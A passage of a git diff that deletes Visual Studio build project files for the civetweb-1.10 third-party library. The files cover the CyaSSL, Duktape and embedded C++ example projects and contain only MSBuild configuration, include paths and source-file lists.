-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>OPENSSL_EXTRA;HAVE_ERRNO_H;HAVE_GETHOSTBYNAME;HAVE_INET_NTOA;HAVE_LIMITS_H;HAVE_MEMSET;HAVE_SOCKET;HAVE_STDDEF_H;HAVE_STDLIB_H;HAVE_STRING_H;HAVE_SYS_STAT_H;HAVE_SYS_TYPES_H;WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>OPENSSL_EXTRA;HAVE_ERRNO_H;HAVE_GETHOSTBYNAME;HAVE_INET_NTOA;HAVE_LIMITS_H;HAVE_MEMSET;HAVE_SOCKET;HAVE_STDDEF_H;HAVE_STDLIB_H;HAVE_STRING_H;HAVE_SYS_STAT_H;HAVE_SYS_TYPES_H;WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>OPENSSL_EXTRA;HAVE_ERRNO_H;HAVE_GETHOSTBYNAME;HAVE_INET_NTOA;HAVE_LIMITS_H;HAVE_MEMSET;HAVE_SOCKET;HAVE_STDDEF_H;HAVE_STDLIB_H;HAVE_STRING_H;HAVE_SYS_STAT_H;HAVE_SYS_TYPES_H;WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\aes.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\arc4.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\asn.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\coding.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\des3.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\dh.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\dsa.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\ecc.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\error.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\hc128.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\hmac.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\integer.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\logging.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\md2.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\md4.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\md5.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\memory.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\misc.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\pwdbased.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\rabbit.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\random.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\ripemd.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\rsa.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\sha.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\sha256.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\sha512.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\tfm.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\crl.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\internal.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\io.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\keys.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\ocsp.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\sniffer.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\ssl.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\tls.c" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/yassl_lib/yassl_lib.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/yassl_lib/yassl_lib.vcxproj.filters
deleted file mode 100644
index 566b892..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/yassl_lib/yassl_lib.vcxproj.filters
+++ /dev/null
@@ -1,124 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\aes.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\arc4.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\asn.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\coding.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\des3.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\dh.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\dsa.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\ecc.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\error.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\hc128.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\hmac.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\integer.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\logging.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\md2.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\md4.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\md5.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\memory.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\misc.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\pwdbased.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\rabbit.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\random.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\ripemd.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\rsa.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\sha.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\sha256.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\sha512.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\tfm.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\crl.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\internal.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\io.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\keys.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\ocsp.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\sniffer.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\ssl.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\tls.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/duktape_lib/duktape_lib.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/duktape_lib/duktape_lib.vcxproj
deleted file mode 100644
index 12fa214..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/duktape_lib/duktape_lib.vcxproj
+++ /dev/null
@@ -1,156 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>duktape_lib</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>TurnOffAllWarnings</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>duktape_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;_DEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>duktape_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>duktape_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>duktape_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\third_party\duktape-1.5.2\src\duktape.h" />

-    <ClInclude Include="..\..\src\third_party\duktape-1.5.2\src\duk_config.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\third_party\duktape-1.5.2\src\duktape.c" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/duktape_lib/duktape_lib.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/duktape_lib/duktape_lib.vcxproj.filters
deleted file mode 100644
index 1aab8c8..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/duktape_lib/duktape_lib.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\third_party\duktape-1.5.2\src\duk_config.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\src\third_party\duktape-1.5.2\src\duktape.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\third_party\duktape-1.5.2\src\duktape.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_embed_cpp/ex_embed_cpp.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/ex_embed_cpp/ex_embed_cpp.vcxproj
deleted file mode 100644
index a195fb6..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_embed_cpp/ex_embed_cpp.vcxproj
+++ /dev/null
@@ -1,162 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>ex_embed_cpp</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140_xp</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140_xp</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

